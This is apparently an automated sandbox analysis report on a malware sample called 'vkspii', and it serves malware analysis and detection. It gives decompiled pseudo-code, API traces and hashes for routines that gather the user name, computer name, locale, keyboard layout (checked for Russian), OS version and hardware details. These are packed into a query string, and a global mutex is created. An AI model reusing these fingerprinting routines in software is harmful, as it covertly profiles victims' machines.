0x00406e3f
0x00000000
0x00000000
0x00406e51
0x00000000
0x00406e51

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
GetComputerNameW.KERNEL32 ref: 00406DF0
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
wsprintfW.USER32 ref: 00406E51
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
GetLastError.KERNEL32 ref: 00406EC9
RegCloseKey.ADVAPI32(00000000), ref: 00406ED2
VirtualFree.KERNEL32(004048B6,00000000,00008000), ref: 00406EEF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00406F0D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00406F23
wsprintfW.USER32 ref: 00406F49
RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,00404590), ref: 00406F6B
RegQueryValueExW.ADVAPI32(00404590,00000000,00000000,00000000,?,?), ref: 00406F8D
GetLastError.KERNEL32 ref: 00406FA0
RegCloseKey.ADVAPI32(00404590), ref: 00406FA9
lstrcmpiW.KERNEL32(?,00000419), ref: 00406FBD
wsprintfW.USER32 ref: 00406FCF
wsprintfW.USER32 ref: 00407009
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407018
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0040703C
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00407060
RegQueryValueExW.ADVAPI32(?,productName,00000000,00000000,00404590,?), ref: 00407084
GetLastError.KERNEL32 ref: 00407097
RegCloseKey.ADVAPI32(?), ref: 004070A0
wsprintfW.USER32 ref: 004070D1
GetNativeSystemInfo.KERNEL32(?), ref: 004070E0
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 004070F1
wsprintfW.USER32 ref: 0040712F
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0040716D
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 00407180
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00407194
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 004071D4
RegOpenKeyExW.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 004071F6
RegQueryValueExW.KERNELBASE(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 0040721B
GetLastError.KERNEL32 ref: 0040722E
RegCloseKey.ADVAPI32(?), ref: 00407237
lstrlenW.KERNEL32(00000000), ref: 00407246

Part of subcall function 00406D10: RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
Part of subcall function 00406D10: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
Part of subcall function 00406D10: RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57

wsprintfW.USER32 ref: 0040727A
lstrcatW.KERNEL32(?,00000000), ref: 0040728B
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00407297
GetProcAddress.KERNEL32(00000000), ref: 0040729E
lstrlenW.KERNEL32(?), ref: 004072AE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004072E1
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00407338
GetDriveTypeW.KERNEL32(?), ref: 0040737D
lstrcatW.KERNEL32(?,?), ref: 004073A4
lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6

Strings

undefined, xrefs: 00406E49
Itanium, xrefs: 0040711B
productName, xrefs: 0040707C, 004070B5
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 004070BA
Control Panel\International, xrefs: 00406E81
WORKGROUP, xrefs: 00406E41
00000419, xrefs: 00406FB5
LocaleName, xrefs: 00406EAE
x86, xrefs: 00407122
ntdll.dll, xrefs: 00407292
ARM, xrefs: 00407114
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 004071EC, 0040725E
error, xrefs: 004070C9
Keyboard Layout\Preload, xrefs: 00406F61
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0040704F
Domain, xrefs: 00406E20
?:\, xrefs: 00407352
ProcessorNameString, xrefs: 0040720C
RtlComputeCrc32, xrefs: 0040728D
Unknown, xrefs: 00407129
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 00406E25
%I64u, xrefs: 00407451
x64, xrefs: 0040710D
%I64u/, xrefs: 00407432
@, xrefs: 00406E9F
Identifier, xrefs: 00407259

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
String ID: %I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 2088797152-983031137
Opcode ID: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
Instruction ID: bc76af88716f23ffac07bfdbeb53bd65fae384ef587bd9da7bafbc6315d7b6d0
Opcode Fuzzy Hash: 4b4486b9acf773ae0f847d189a5d2366a2d9619d22d80a8bcc30b947846ab7ea
Instruction Fuzzy Hash: 5A228570A40305AFEB209FA0CD49FAE7BB5FF04704F10442AF641B62E1D7B9A995CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004069A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 004069C1
lstrcatW.KERNEL32(?,004103F0), ref: 004069C9
lstrcatW.KERNEL32(?,?), ref: 004069D2
lstrcatW.KERNEL32(?,004103F4), ref: 004069DA
lstrcatW.KERNEL32(?,?), ref: 004069E5
lstrcatW.KERNEL32(?,004103F0), ref: 004069ED
lstrcatW.KERNEL32(?,?), ref: 004069F3
lstrcatW.KERNEL32(?,004103F4), ref: 004069FB
lstrcatW.KERNEL32(?,?), ref: 00406A07
lstrcatW.KERNEL32(?,004103F0), ref: 00406A0F
lstrcatW.KERNEL32(?,?), ref: 00406A15
lstrcatW.KERNEL32(?,004103F4), ref: 00406A1D
lstrcatW.KERNEL32(?,?), ref: 00406A29
lstrcatW.KERNEL32(?,004103F0), ref: 00406A31
lstrcatW.KERNEL32(?,?), ref: 00406A37
lstrcatW.KERNEL32(?,004103F4), ref: 00406A3F
lstrcatW.KERNEL32(?,?), ref: 00406A4B
lstrcatW.KERNEL32(?,004103F0), ref: 00406A53
lstrcatW.KERNEL32(?,?), ref: 00406A59
lstrcatW.KERNEL32(?,004103F4), ref: 00406A61
lstrcatW.KERNEL32(?,?), ref: 00406A6D
lstrcatW.KERNEL32(?,004103F0), ref: 00406A75
lstrcatW.KERNEL32(?,004048B6), ref: 00406A7B
lstrcatW.KERNEL32(?,004103F4), ref: 00406A83
lstrcatW.KERNEL32(?,?), ref: 00406A8F
lstrcatW.KERNEL32(?,004103F0), ref: 00406A97
lstrcatW.KERNEL32(?,?), ref: 00406A9D
lstrcatW.KERNEL32(?,004103F4), ref: 00406AA5
lstrcatW.KERNEL32(?,?), ref: 00406AB1
lstrcatW.KERNEL32(?,004103F0), ref: 00406AB9
lstrcatW.KERNEL32(?,?), ref: 00406ABF
lstrcatW.KERNEL32(?,004103F4), ref: 00406AC7
lstrcatW.KERNEL32(?,?), ref: 00406AD3
lstrcatW.KERNEL32(?,004103F0), ref: 00406ADB
lstrcatW.KERNEL32(?,?), ref: 00406AE1
lstrcatW.KERNEL32(?,004103F4), ref: 00406AE9
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000), ref: 00406AFC
wsprintfW.USER32 ref: 00406B16
wsprintfW.USER32 ref: 00406B27
lstrcatW.KERNEL32(?,?), ref: 00406B34
lstrcatW.KERNEL32(?,004103F0), ref: 00406B3C
lstrcatW.KERNEL32(?,?), ref: 00406B42
lstrcatW.KERNEL32(?,004103F4), ref: 00406B4A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 00406B56
lstrcatW.KERNEL32(?,?), ref: 00406B66
lstrcatW.KERNEL32(?,004103F0), ref: 00406B6E
lstrcatW.KERNEL32(?,?), ref: 00406B74
lstrcatW.KERNEL32(?,004103F4), ref: 00406B7C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,004045E9,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00406B7F

Strings

%x%x, xrefs: 00406B10
undefined, xrefs: 00406B21

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction ID: 157d45b09fe4d6cbf2a129cbf998294f04408a9e253f235917979037099c56e6
Opcode Fuzzy Hash: b4ce8e6092dab11b5570eb4b7fe377be8a76f675d54b5694e6accb4a7b5be685
Instruction Fuzzy Hash: 80511B31281669B7CB273B658C49FDF3A19EF86700F124061F91028096CFBD9592DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404550 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83
stringmemorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045AC
lstrcpyW.KERNEL32 ref: 004045CF
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045D6
CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045EE
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004045FA
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00404601
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040461B

Strings

Global\, xrefs: 004045C9

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction ID: 4f5a3050133a9d70e6d79b6919bbb594e2943cbf5e181e58d482f905f9ddffb5
Opcode Fuzzy Hash: 60700ccbb66975790bdd6c2481cc6c90d6354a02fbe93d1c0f5e8eb0fcf3caff
Instruction Fuzzy Hash: 6721D4B16503217BE224A724DC4BF6F7A5CDB80744F500639F706761D0EAB87D0486EE

Uniqueness

Uniqueness Score: -1.00%

Function 00407720 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407720(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407739
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040774B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040775D
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0040776F
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407781
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00407793
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077A5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077B7
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077C9
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0040462A,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 004077E1

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction ID: 79a2428a1de1d862086b34f36251e2aa8ec78ad52842245a2806986d354140b0
Opcode Fuzzy Hash: 3fc008402963f2d3cbecf3a86f23b2e7ee5b4610d3041296055b4ddd3abf16a0
Instruction Fuzzy Hash: C7211C30280B04AAF7762B15CC4AF66B2E1BB40B45F254839F2C1395F08BF97889DF09

Uniqueness

Uniqueness Score: -1.00%

Function 00406D10 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406D10(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x00406d26
0x00406d30
0x00406d84
0x00406d32
0x00406d35
0x00406d47
0x00406d4f
0x00406d66
0x00406d6f
0x00406d7b
0x00406d51
0x00406d54
0x00406d57
0x00406d63
0x00406d63
0x00406d4f

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,00000000,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D26
RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000080,?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D47
RegCloseKey.KERNELBASE(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D57
GetLastError.KERNEL32(?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D66
RegCloseKey.ADVAPI32(?,?,0040726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00406D6F

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction ID: 038fbdeb07fc8f9d94efb3036f8b9b37cf4c52d37effb2f9ef8d9ff464795a08
Opcode Fuzzy Hash: 9e6bb54fed31df0af1995cc1e5d9b2912871e352615202f1e244d14966f57426
Instruction Fuzzy Hash: 3D011A7260011CABCB209F94EE09DDA7B7CEF08351F008162FD05E6121D7329E20EBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 1.5, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t2;

				E004048A0(_t2); // executed
				ExitProcess(0);
			}

0x00404af3
0x00404afa

APIs

Part of subcall function 004048A0: Sleep.KERNELBASE(000003E8), ref: 004048AB
Part of subcall function 004048A0: ExitProcess.KERNEL32 ref: 004048BC

ExitProcess.KERNEL32 ref: 00404AFA

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: ExitProcess$Sleep
String ID:
